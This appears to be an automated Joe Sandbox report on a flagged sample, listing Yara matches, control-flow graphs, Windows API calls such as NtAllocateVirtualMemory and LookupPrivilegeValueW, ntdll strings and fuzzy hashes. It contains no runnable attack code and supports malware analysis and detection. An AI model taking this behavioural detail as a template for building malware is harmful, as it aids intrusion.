                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

                                            Control-flow Graph
                                            control_flow_graph 269 41a53d-41a556 270 41a55c-41a57d NtAllocateVirtualMemory 269->270 271 41a557 call 41af60 269->271 271->270
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 43b518bbb4c12f68443765ada0e04a3063f2ea4034a93cff4e1a2e94bde262cf
                                            • Instruction ID: ee0f5891d9d372d632102c49d92fdbaa2a79b28d3c1271333aa80f393085cc74
                                            • Opcode Fuzzy Hash: 43b518bbb4c12f68443765ada0e04a3063f2ea4034a93cff4e1a2e94bde262cf
                                            • Instruction Fuzzy Hash: 43F030B1100149ABCB15DF58DC84CA7B7ACFF88224B15C65DF95D97206C634E865CBB0
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 92dedd6702eb8ad2caae876ab8f71e3ff27e88b093f6378cee5cf59b4ead6dde
                                            • Instruction ID: e0321f9a72b59e39f9df2f21ec1500eaacf6fb0962d4f700dc14f9a4f36017b4
                                            • Opcode Fuzzy Hash: 92dedd6702eb8ad2caae876ab8f71e3ff27e88b093f6378cee5cf59b4ead6dde
                                            • Instruction Fuzzy Hash: 5E90023120141802D180715C440564A004597D1301F96C015F0025654DCE198B5977A1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e02770239fbc6f7bb17d62ecb8f8cbb96d3dc8c0989beec08276896d82ed9807
                                            • Instruction ID: 0109cd53e9de6771bef5c283d7ca1cadf80ea2ed99d54f5f8d2fffd3b84c69fe
                                            • Opcode Fuzzy Hash: e02770239fbc6f7bb17d62ecb8f8cbb96d3dc8c0989beec08276896d82ed9807
                                            • Instruction Fuzzy Hash: 5B900261202410034105715C4415616404A97E0201F56C021F1014590DC92989916225
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 0d72e97ccb07fd19ad8c488303fe99dae00dee62e2d62eb546cea2e8a6a41711
                                            • Instruction ID: 90e6df70d615d200e73efb95b91fc48b5f557ef9505b2199193e9cf564ee93dd
                                            • Opcode Fuzzy Hash: 0d72e97ccb07fd19ad8c488303fe99dae00dee62e2d62eb546cea2e8a6a41711
                                            • Instruction Fuzzy Hash: 07900435311410030105F55C070550700C7D7D5351757C031F1015550CDF35CD715331
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a407199653be257ee5a08ab953c8aad3dfbc037d1e553fa33781490fe1e1ede4
                                            • Instruction ID: 2d38dc8207e6b41cf4f8522b6d2e72df2cc97a1b7e354c1df3f26eb9e6ec7747
                                            • Opcode Fuzzy Hash: a407199653be257ee5a08ab953c8aad3dfbc037d1e553fa33781490fe1e1ede4
                                            • Instruction Fuzzy Hash: 2A90023120141413D111715C4505707004997D0241F96C412F0424558DDA5A8A52A221
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f7e01e8e5898797a2ac2b550f421316ffdf81120d38af183e153805c9866dd18
                                            • Instruction ID: 770607b89cb1d8e5cf1e2e9ab25005bd287fc59c147018fa187cabc64564a377
                                            • Opcode Fuzzy Hash: f7e01e8e5898797a2ac2b550f421316ffdf81120d38af183e153805c9866dd18
                                            • Instruction Fuzzy Hash: BE900221242451525545B15C44055074046A7E0241B96C012F1414950CC92A9956D721
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4746bbf8b64e6b262028aa86bf036786b36fe6f1a0e8198f280b3f29dedaa6e3
                                            • Instruction ID: 826481beae15e9936a3572c672128fd81ae513b99ff6451a9fb86bb23e1aa87b
                                            • Opcode Fuzzy Hash: 4746bbf8b64e6b262028aa86bf036786b36fe6f1a0e8198f280b3f29dedaa6e3
                                            • Instruction Fuzzy Hash: 0A90043130141003D140715C541D7074045F7F1301F57D011F0414554CDD1DCD575333
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3b7b90f9d917314b54feec6deb1393c39ac5796fe6cee8b544da2d827f794319
                                            • Instruction ID: bc64aa762b1a8d8b5022ce0e3faced874df0ee9d6531e115b91ed1f636a00dbd
                                            • Opcode Fuzzy Hash: 3b7b90f9d917314b54feec6deb1393c39ac5796fe6cee8b544da2d827f794319
                                            • Instruction Fuzzy Hash: 9A90022921341002D180715C540960A004597D1202F96D415F0015558CCD1989695321
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c7b3c0c98597f21ba9864a60ec2a296f246198718688d9cd141983d4610d57dd
                                            • Instruction ID: aafaebe98ab865f26c8d3560bd1308562121a820fac448a59a9e333e02d131c2
                                            • Opcode Fuzzy Hash: c7b3c0c98597f21ba9864a60ec2a296f246198718688d9cd141983d4610d57dd
                                            • Instruction Fuzzy Hash: 5490023120141402D100759C5409646004597E0301F56D011F5024555ECA6989916231
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4cc1cd299a201ad809ef8f0ba2df61a53a845c1e909905f17a8b383f3ede7c3b
                                            • Instruction ID: 93c8dca32789ed31492bb142e21830eddf2ccb9c26cb190f3a2a3bb4a3a8e498
                                            • Opcode Fuzzy Hash: 4cc1cd299a201ad809ef8f0ba2df61a53a845c1e909905f17a8b383f3ede7c3b
                                            • Instruction Fuzzy Hash: BA90023120149802D110715C840574A004597D0301F5AC411F4424658DCA9989917221
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Control-flow Graph

                                            Basic blocks (id: address range, calls):
                                            • 6: 41a630-41a661, call 41af60, RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478

                                            Control-flow Graph

                                            Basic blocks (id: address range, calls):
                                            • 204: 408310-40835a, call 41be60, call 41ca00, call 40acf0, call 414e50
                                            • 213: 40835c-40836e, PostThreadMessageW
                                            • 214: 40838e-408392
                                            • 215: 408370-40838a, call 40a480
                                            • 216: 40838d
                                            Edges: 204->213, 204->214, 213->215, 213->216, 215->216, 216->214
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0

                                            Control-flow Graph

                                            Basic blocks (id: address range, calls):
                                            • 219: 41a808-41a80d
                                            • 220: 41a7c5-41a7e9
                                            • 221: 41a80f-41a840, call 41af60
                                            • 223: 41a7ef-41a804, LookupPrivilegeValueW
                                            • 224: 41a7ea, call 41af60
                                            Edges: 219->220, 219->221, 220->223, 220->224, 224->223
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0

                                            Control-flow Graph

                                            Basic blocks (id: address range, calls):
                                            • 253: 41a662-41a66e
                                            • 254: 41a670-41a68c, call 41af60
                                            • 255: 41a68d-41a6a1, RtlFreeHeap
                                            Edges: 253->254, 253->255, 254->255
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0

                                            Control-flow Graph

                                            Basic blocks (id: address range, calls):
                                            • 258: 408393-40839d
                                            • 259: 408361-40836e, PostThreadMessageW
                                            • 260: 40839f
                                            • 261: 408370-40838a, call 40a480
                                            • 262: 40838d-408392
                                            Edges: 258->259, 258->260, 259->261, 259->262, 261->262
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0

                                            Control-flow Graph

                                            Basic blocks (id: address range, calls):
                                            • 272: 41a7c1-41a7ea, call 41af60
                                            • 274: 41a7ef-41a804, LookupPrivilegeValueW
                                            Edges: 272->274
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2047920675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_tYEY1UeurGz0Mjb.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2160512332
                                            Strings
                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A4540A, 01A45496, 01A45519
                                            • Thread identifier, xrefs: 01A4553A
                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A454CE
                                            • double initialized or corrupted critical section, xrefs: 01A45508
                                            • corrupted critical section, xrefs: 01A454C2
                                            • Critical section address, xrefs: 01A45425, 01A454BC, 01A45534
                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01A45543
                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A454E2
                                            • undeleted critical section in freed memory, xrefs: 01A4542B
                                            • Invalid debug info address of this critical section, xrefs: 01A454B6
                                            • 8, xrefs: 01A452E3
                                            • Address of the debug info found in the active list., xrefs: 01A454AE, 01A454FA
                                            • Critical section address., xrefs: 01A45502
                                            • Critical section debug info address, xrefs: 01A4541F, 01A4552E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                            • API String ID: 0-2368682639
                                            Strings
                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A42412
                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A424C0
                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A42506
                                            • @, xrefs: 01A4259B
                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A42624
                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A4261F
                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A422E4
                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A42602
                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A425EB
                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A42498
                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A42409
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                            • API String ID: 0-4009184096
                                            • Opcode ID: b3664140be7aad7b8a2b8a7d4213f599fb6322aa78bf8e7a36f1969b135882c9
                                            • Instruction ID: 8f52da6abc28dd7c059537f3c90e6b571761d13930fd9e859483bc2e3264e46c
                                            • Opcode Fuzzy Hash: b3664140be7aad7b8a2b8a7d4213f599fb6322aa78bf8e7a36f1969b135882c9
                                            • Instruction Fuzzy Hash: 110251F1D002299BDB31DB54DD84BE9B7B8AF94704F0441EAE60DA7281DB70AE84CF59
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                            • API String ID: 0-2515994595
                                            • Opcode ID: bc6f0a6abf60b7c4fb24c01d09977ec1b87e4538ac5faa5e2730ae8707c818bf
                                            • Instruction ID: 8717eb50faffba8778b03a482ca60ec30bcc05cb103e581e7faaa962be17d5b0
                                            • Opcode Fuzzy Hash: bc6f0a6abf60b7c4fb24c01d09977ec1b87e4538ac5faa5e2730ae8707c818bf
                                            • Instruction Fuzzy Hash: D651BD716043019FD329CF588D89BABBBECFF94640F54491DAA99C3241E778D608CBD2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                            • API String ID: 0-1700792311
                                            • Opcode ID: 4b03f4f8436df784bc6f448d1f7439d6f9436834abf0a42821192ca9cee6bbf9
                                            • Instruction ID: 5e988863c0ea199c66415476446fcef22f371556ef440044035f67cfa2053ded
                                            • Opcode Fuzzy Hash: 4b03f4f8436df784bc6f448d1f7439d6f9436834abf0a42821192ca9cee6bbf9
                                            • Instruction Fuzzy Hash: 58D12235600681DFDB26EF68C511AADBBF1FF89714F08805DF48AAB252C734D949CB25
                                            Strings
                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A58A67
                                            • VerifierDebug, xrefs: 01A58CA5
                                            • HandleTraces, xrefs: 01A58C8F
                                            • AVRF: -*- final list of providers -*- , xrefs: 01A58B8F
                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A58A3D
                                            • VerifierDlls, xrefs: 01A58CBD
                                            • VerifierFlags, xrefs: 01A58C50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                            • API String ID: 0-3223716464
                                            • Opcode ID: 8fad858edfea512346484bc1c7bd1fe8311c12abe0061c5bdf636e16d058d6f9
